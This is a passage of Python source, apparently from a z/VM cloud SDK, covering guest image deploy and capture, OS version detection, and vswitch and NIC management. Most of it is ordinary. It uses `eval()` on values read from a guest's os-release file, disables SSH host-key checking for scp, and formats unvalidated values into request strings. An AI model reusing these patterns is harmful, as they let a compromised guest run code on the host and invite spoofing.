raise exception.SDKGuestOperationError(rs=13, userid=userid)
if skipdiskcopy:
msg = ('Start guest_deploy without disk copy, guest: %(vm)s, '
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = None
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
tmp_trans_dir = None
try:
if remotehost:
# Download the ignition file from the remote host
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy ignition file with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
transportfiles = local_trans
cmd = self._get_unpackdiskimage_cmd_rhcos(userid, image_name,
transportfiles, vdev,
image_file, hostname,
skipdiskcopy)
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
finally:
# remove the temp ignition file
if tmp_trans_dir:
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Update os version in guest metadata
# TODO: may need to append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
os_version = self.image_get_os_distro(image_name)
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without disk copy finished successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_capture(self, userid, image_name, capture_type='rootonly',
compress_level=6):
if capture_type == "alldisks":
func = ('Capture guest with type: %s' % capture_type)
msg = ('%s is not supported in current release' % func)
LOG.error(msg)
raise exception.SDKFunctionNotImplementError(func=func,
modID='guest')
msg = ('Start to capture %(vm)s to generate image %(img)s with '
'capture type %(type)s' % {'vm': userid,
'img': image_name,
'type': capture_type})
LOG.info(msg)
self._check_power_state(userid, 'capture')
# Make sure the iucv channel is ready for communication on source vm
try:
self.execute_cmd(userid, 'pwd')
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to check iucv status on capture source vm '
'%(vm)s with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# Get the os version of the vm
try:
os_version = self._guest_get_os_version(userid)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on capture source vm %(vm)s '
'to get os version with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Error happened when parsing os version on source vm '
'%(vm)s with error: %(err)s' % {'vm': userid,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
msg = ('The os version of capture source vm %(vm)s is %(version)s' %
{'vm': userid,
'version': os_version})
LOG.info(msg)
# Find the root device according to the capture type
try:
capture_devices = self._get_capture_devices(userid, capture_type)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on source vm %(vm)s to get the '
'devices for capture with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except exception.SDKGuestOperationError:
raise
except Exception as err:
msg = ('Internal error happened when getting the devices for '
'capture on source vm %(vm)s with error %(err)s' %
{'vm': userid,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# Shutdown the vm before capture
self.guest_softstop(userid)
# Prepare directory for writing image file
image_temp_dir = '/'.join((CONF.image.sdk_image_repository,
const.IMAGE_TYPE['CAPTURE'],
os_version,
image_name))
self._pathutils.mkdir_if_not_exist(image_temp_dir)
# Call creatediskimage to capture a vm to generate an image
# TODO:(nafei) to support multiple disk capture
vdev = capture_devices[0]
msg = ('Found the device %(vdev)s of %(vm)s for capture' %
{'vdev': vdev, 'vm': userid})
LOG.info(msg)
image_file_name = vdev
image_file_path = '/'.join((image_temp_dir, image_file_name))
cmd = ['sudo', '/opt/zthin/bin/creatediskimage', userid, vdev,
image_file_path, '--compression', str(compress_level)]
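# Illustrative example (assumed values): for vdev '0100' and the default
# compression level this runs roughly
# ['sudo', '/opt/zthin/bin/creatediskimage', 'LINUX01', '0100',
# '<repo>/<capture_dir>/rhel7.2/myimage/0100', '--compression', '6']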
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("creatediskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
self._pathutils.clean_temp_folder(image_temp_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=err_output)
# Move the generated image to netboot folder
image_final_dir = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
os_version,
image_name])
image_final_path = '/'.join((image_final_dir,
image_file_name))
self._pathutils.mkdir_if_not_exist(image_final_dir)
cmd = ['mv', image_file_path, image_final_path]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("move image file from staging to netboot "
"folder failed with return code: %d." % rc)
LOG.error(err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
self._pathutils.clean_temp_folder(image_final_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
err=err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
msg = ('Updating the metadata for captured image %s ' % image_name)
LOG.info(msg)
# Get md5sum of image
real_md5sum = self._get_md5sum(image_final_path)
# Get disk_size_units of image
disk_size_units = self._get_disk_size_units(image_final_path)
# Get the image physical size
image_size = self._get_image_size(image_final_path)
# Create the image record in image database
self._ImageDbOperator.image_add_record(image_name, os_version,
real_md5sum, disk_size_units, image_size,
capture_type)
LOG.info('Image %s is captured and imported to image repository '
'successfully' % image_name)
def _guest_get_os_version(self, userid):
os_version = ''
release_file = self.execute_cmd(userid, 'ls /etc/*-release')
if '/etc/os-release' in release_file:
# Parse os-release file, part of the output looks like:
# NAME="Red Hat Enterprise Linux Server"
# ID="rhel"
# VERSION_ID="7.0"
release_info = self.execute_cmd(userid, 'cat /etc/os-release')
release_dict = {}
for item in release_info:
if item:
release_dict[item.split('=')[0]] = item.split('=')[1]
distro = release_dict['ID']
version = release_dict['VERSION_ID']
if '"' in distro:
distro = eval(distro)
if '"' in version:
version = eval(version)
os_version = '%s%s' % (distro, version)
return os_version
elif '/etc/redhat-release' in release_file:
# The output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/redhat-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
elif '/etc/SuSE-release' in release_file:
# The output for this file looks like:
# SUSE Linux Enterprise Server 11 (s390x)
# VERSION = 11
# PATCHLEVEL = 3
distro = 'sles'
release_info = self.execute_cmd(userid, 'cat /etc/SuSE-release')
LOG.debug('OS release info is %s' % release_info)
release_version = '.'.join((release_info[1].split('=')[1].strip(),
release_info[2].split('=')[1].strip()))
os_version = ''.join((distro, release_version))
return os_version
elif '/etc/system-release' in release_file:
# Some rhel6.7 systems only have the system-release file and
# the output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/system-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
def _get_capture_devices(self, userid, capture_type='rootonly'):
capture_devices = []
if capture_type == 'rootonly':
# Parse the /proc/cmdline to get root devices
proc_cmdline = self.execute_cmd(userid, 'cat /proc/cmdline '
'| tr " " "\\n" | grep -a "^root=" | cut -c6-')
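# The pipeline above prints only the value of the root= kernel parameter,
# e.g. 'UUID=1111-2222-3333', 'LABEL=rootfs' or '/dev/dasda1'.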
root_device_info = proc_cmdline[0]
if not root_device_info:
msg = ('Unable to get useful info from /proc/cmdline to '
'locate the device associated with the root directory '
'on capture source vm %s' % userid)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
if 'UUID=' in root_device_info:
uuid = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-uuid', uuid))
elif 'LABEL=' in root_device_info:
label = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-label', label))
elif 'mapper' in root_device_info:
msg = ('Capturing a disk with root filesystem on logical'
' volume is not supported')
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
root_device = root_device_info
root_device_node = self.execute_cmd(userid, 'readlink -f %s' %
root_device)[0]
# Get device node vdev by node name
cmd = ('cat /proc/dasd/devices | grep -i "is %s" ' %
root_device_node.split('/')[-1].rstrip(string.digits))
result = self.execute_cmd(userid, cmd)[0]
root_device_vdev = result.split()[0][4:8]
capture_devices.append(root_device_vdev)
return capture_devices
else:
# For sysclone, parse the user directory entry to get the devices
# for capture, leave for future
pass
def _get_unpackdiskimage_cmd_rhcos(self, userid, image_name,
transportfiles=None, vdev=None,
image_file=None, hostname=None,
skipdiskcopy=False):
if skipdiskcopy:
os_version = image_name
image_disk_type = 'SCSI'
else:
os_version = self.image_get_os_distro(image_name)
# Query image disk type
image_disk_type = self._get_image_disk_type(image_name)
if image_disk_type is None:
err_msg = ("failed to get image disk type for "
"image '%(image_name)s'."
% {'image_name': image_name})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
try:
# Get the Linux distro handler for the target os version
from zvmsdk import dist
_dist_manager = dist.LinuxDistManager()
linuxdist = _dist_manager.get_linux_dist(os_version)()
# Read the coreos fixed ip parameter from the tempfile
fixed_ip_parameter = linuxdist.read_coreos_parameter(userid)
except Exception as err:
err_msg = ("failed to read coreos fixed ip "
"parameters for userid '%(userid)s',"
"error: %(err)s."
% {'userid': userid, 'err': err})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if fixed_ip_parameter is None:
err_msg = ("coreos fixed ip parameters don't exist.")
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if hostname:
# Replace the userid in the parameter with the display name (hostname)
fixed_ip_parameter = fixed_ip_parameter.replace(userid.upper(),
hostname)
# read nic device id and change it into the form like
# "0.0.1000,0.0.1001,0.0.1002"
nic_id = self._generate_increasing_nic_id(
fixed_ip_parameter.split(":")[5].replace("enc", ""))
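# e.g. an interface name like 'enc1000' in the parameter yields a nic_id
# of roughly '0.0.1000,0.0.1001,0.0.1002' (per the format noted above).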
if image_disk_type == 'SCSI':
(wwpn, lun) = self._get_wwpn_lun(userid)
if wwpn is None or lun is None:
err_msg = ("wwpn and lun is required for FCP devices,"
" please set LOADDEV for userid %s" % userid)
raise exception.SDKGuestOperationError(rs=14, userid=userid,
msg=err_msg)
wwpn = '0x' + wwpn
lun = '0x' + lun
if skipdiskcopy:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, transportfiles, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, image_file, transportfiles,
image_disk_type, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file, transportfiles, image_disk_type, nic_id,
fixed_ip_parameter]
def grant_user_to_vswitch(self, vswitch_name, userid):
"""Set vswitch to grant user."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k grant_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to grant user %s to vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def _set_vswitch_exception(self, error, switch_name):
if ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and (error.results['rs'] == 2846)):
errmsg = ("Operation is not allowed for a "
"VLAN UNAWARE vswitch")
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2838) or
(error.results['rs'] == 2853) or
(error.results['rs'] == 2856) or
(error.results['rs'] == 2858) or
(error.results['rs'] == 3022) or
(error.results['rs'] == 3033))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
else:
raise error
def revoke_user_from_vswitch(self, vswitch_name, userid):
"""Revoke user for vswitch."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k revoke_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to revoke user %s from vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def image_performance_query(self, uid_list):
"""Call Image_Performance_Query to get guest current status.
:uid_list: A list of zvm userids to be queried
"""
if uid_list == []:
return {}
if not isinstance(uid_list, list):
uid_list = [uid_list]
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Image_Performance_Query" % smt_userid,
"--operands",
'-T "%s"' % (' '.join(uid_list)),
"-c %d" % len(uid_list)))
action = "get performance info of userid '%s'" % str(uid_list)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
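# The response is parsed into a dict keyed by guest userid; each value is
# a dict holding the string fields listed in ipq_kws above.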
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# When there is only one userid queried and this userid is
# in 'off' state, smcli only returns the queried userid
# number and no valid performance info is returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def system_image_performance_query(self, namelist):
"""Call System_Image_Performance_Query to get guest current status.
:namelist: A namelist that is defined in the smapi namelist file.
"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API System_Image_Performance_Query" % smt_userid,
"--operands -T %s" % namelist))
action = "get performance info of namelist '%s'" % namelist
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# When there is only one userid queried and this userid is
# in 'off' state, smcli only returns the queried userid
# number and no valid performance info is returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def virtual_network_vswitch_query_byte_stats(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Byte_Stats" %
smt_userid,
"--operands",
'-T "%s"' % smt_userid,
'-k "switch_name=*"'
))
action = "query vswitch usage info"
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return self._parse_vswitch_inspect_data(results['response'])
def get_host_info(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost general")
host_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.RINV_HOST_KEYWORDS)
return host_info
def get_diskpool_info(self, pool):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost diskpoolspace %s" % pool)
dp_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.DISKPOOL_KEYWORDS)
return dp_info
def get_vswitch_list(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query" % smt_userid,
"--operands",
"-s \'*\'"))
try:
result = self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
LOG.warning("No Virtual switch in the host")
return []
else:
LOG.error("Failed to get vswitch list, error: %s" %
err.format_message())
raise
with zvmutils.expect_invalid_resp_data():
if (not result['response'] or not result['response'][0]):
return []
else:
data = '\n'.join([s for s in result['response']
if isinstance(s, six.string_types)])
output = re.findall('VSWITCH: Name: (.*)', data)
return output
def set_vswitch_port_vlan_id(self, vswitch_name, userid, vlan_id):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k grant_userid=%s" % userid,
"-k switch_name=%s" % vswitch_name,
"-k user_vlan_id=%s" % vlan_id,
"-k persist=YES"))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set VLAN ID %s on vswitch %s for user %s, "
"error: %s" %
(vlan_id, vswitch_name, userid, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
msg = ('Set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s successfully'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
def add_vswitch(self, name, rdev=None, controller='*',
connection='CONNECT', network_type='ETHERNET',
router="NONROUTER", vid='UNAWARE', port_type='ACCESS',
gvrp='GVRP', queue_mem=8, native_vid=1, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Create_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % name))
if rdev is not None:
rd += " -k real_device_address" +\
"=\'%s\'" % rdev.replace(',', ' ')
if controller != '*':
rd += " -k controller_name=%s" % controller
rd = ' '.join((rd,
"-k connection_value=%s" % connection,
"-k queue_memory_limit=%s" % queue_mem,
"-k transport_type=%s" % network_type,
"-k vlan_id=%s" % vid,
"-k persist=%s" % (persist and 'YES' or 'NO')))
# Only if the vswitch is VLAN aware may port_type, gvrp and
# native_vid be specified
if isinstance(vid, int) or vid.upper() != 'UNAWARE':
rd = ' '.join((rd,
"-k port_type=%s" % port_type,
"-k gvrp_value=%s" % gvrp,
"-k native_vlanid=%s" % native_vid))
if router is not None:
rd += " -k routing_value=%s" % router
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to create vswitch %s, error: %s" %
(name, err.format_message()))
raise
msg = ('Create vswitch %s successfully' % name)
LOG.info(msg)
def set_vswitch(self, switch_name, **kwargs):
"""Set vswitch"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name))
for k, v in kwargs.items():
rd = ' '.join((rd,
"-k %(key)s=\'%(value)s\'" %
{'key': k, 'value': v}))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set vswitch %s, error: %s" %
(switch_name, err.format_message()))
self._set_vswitch_exception(err, switch_name)
def delete_vswitch(self, switch_name, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to delete vswitch %s' % switch_name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Delete_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name,
"-k persist=%s" % (persist and 'YES' or 'NO')))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
if ((results['rc'] == 212) and
(results['rs'] == 40)):
LOG.warning("Vswitch %s does not exist", switch_name)
return
else:
LOG.error("Failed to delete vswitch %s, error: %s" %
(switch_name, err.format_message()))
raise
msg = ('Delete vswitch %s successfully' % switch_name)
LOG.info(msg)
def create_nic(self, userid, vdev=None, nic_id=None,
mac_addr=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'ID is %(id)s, address is %(address)s',
{'vdev': nic_vdev,
'id': nic_id or 'not specified',
'address': mac_addr or 'not specified'})
self._create_nic(userid, nic_vdev, nic_id=nic_id,
mac_addr=mac_addr, active=active)
return nic_vdev
def _create_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _create_nic_active_exception(self, error, userid, vdev):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 28))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
elif ((error.results['rc'] == 396) and
(error.results['rs'] == 2797)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _is_active(self, userid):
# Get the vm status
power_state = self.get_power_state(userid)
if power_state == 'off':
LOG.error('The vm %s is powered off, '
'active operation is not allowed' % userid)
raise exception.SDKConflictError(modID='network', rs=1,
userid=userid)
def _create_nic(self, userid, vdev, nic_id=None, mac_addr=None,
active=False):
if active:
self._is_active(userid)
msg = ('Start to create nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended_DM' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
if mac_addr is not None:
mac = ''.join(mac_addr.split(':'))[6:]
requestData += ' -k mac_id=%s' % mac
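# Only the last six hex digits of the MAC address are passed as mac_id;
# the leading half is assumed to be supplied by the z/VM system MAC prefix.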
retry = 1
for secs in [1, 3, 5, 8, -1]:
try:
self._request(requestData)
break
except exception.SDKSMTRequestFailed as err:
if (err.results['rc'] == 400 and
err.results['rs'] == 12 and
retry < 5):
LOG.info("The VM is locked, will retry")
time.sleep(secs)
retry += 1
else:
LOG.error("Failed to create nic %s for user %s in "
"the guest's user direct, error: %s" %
(vdev, userid, err.format_message()))
self._create_nic_inactive_exception(err, userid, vdev)
if active:
if mac_addr is not None:
LOG.warning("Ignore the mac address %s when "
"adding nic on an active system" % mac_addr)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
msg1 = err1.format_message()
persist_OK = True
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Delete_DM' % userid,
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results = err2.results
msg2 = err2.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._create_nic_active_exception(err1, userid, vdev)
else:
raise exception.SDKNetworkOperationError(rs=4,
nic=vdev, userid=userid,
create_err=msg1, revoke_err=msg2)
self._NetDbOperator.switch_add_record(userid, vdev, port=nic_id)
msg = ('Create nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def get_user_direct(self, userid):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm %s directory" % userid)
return results.get('response', [])
def get_all_user_direct(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm alldirectory")
return results.get('response', [])
def _delete_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=8,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _delete_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=9,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def delete_nic(self, userid, vdev, active=False):
if active:
self._is_active(userid)
vdev_exist = False
nic_list = self._NetDbOperator.switch_select_record_for_userid(userid)
for p in nic_list:
if (int(p['interface'], 16) == int(vdev, 16)):
vdev_exist = True
vdev_info = p
break
if not vdev_exist:
# The device has already been removed from the user direct
LOG.warning("Virtual device %s does not exist in the switch table",
vdev)
if active:
try:
resp = self.execute_cmd(userid, 'vmcp q %s' % vdev)
nic_info = "%s ON NIC" % vdev.zfill(4).upper()
osa_info = "%s ON OSA" % vdev.zfill(4).upper()
if nic_info in resp[0]:
pass
elif osa_info in resp[0]:
self._undedicate_nic(userid, vdev, active=active,
del_active_only=True)
return
else:
LOG.warning("Device %s of guest %s is not "
"network adapter" % (vdev, userid))
return
except exception.SDKSMTRequestFailed as err:
emsg = err.format_message()
ignored_msg = ('Device %s does not exist'
% vdev.zfill(4).upper())
if (emsg.__contains__(ignored_msg)):
LOG.warning("Virtual device %s does not exist for "
"active guest %s" % (vdev, userid))
return
else:
raise
else:
return
else:
# The device has not been removed from the user direct,
# check whether it is related to a dedicated OSA device
if ((vdev_info["comments"] is not None) and
(vdev_info["comments"].__contains__('OSA='))):
self._undedicate_nic(userid, vdev, active=active)
return
msg = ('Start to delete nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if vdev_exist:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete_DM" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to delete nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._delete_nic_inactive_exception(err, userid, vdev)
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to delete nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._delete_nic_active_exception(err, userid, vdev)
msg = ('Delete nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _couple_active_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 212) and
((error.results['rs'] == 28) or
(error.results['rs'] == 8))):
errmsg = error.format_message()
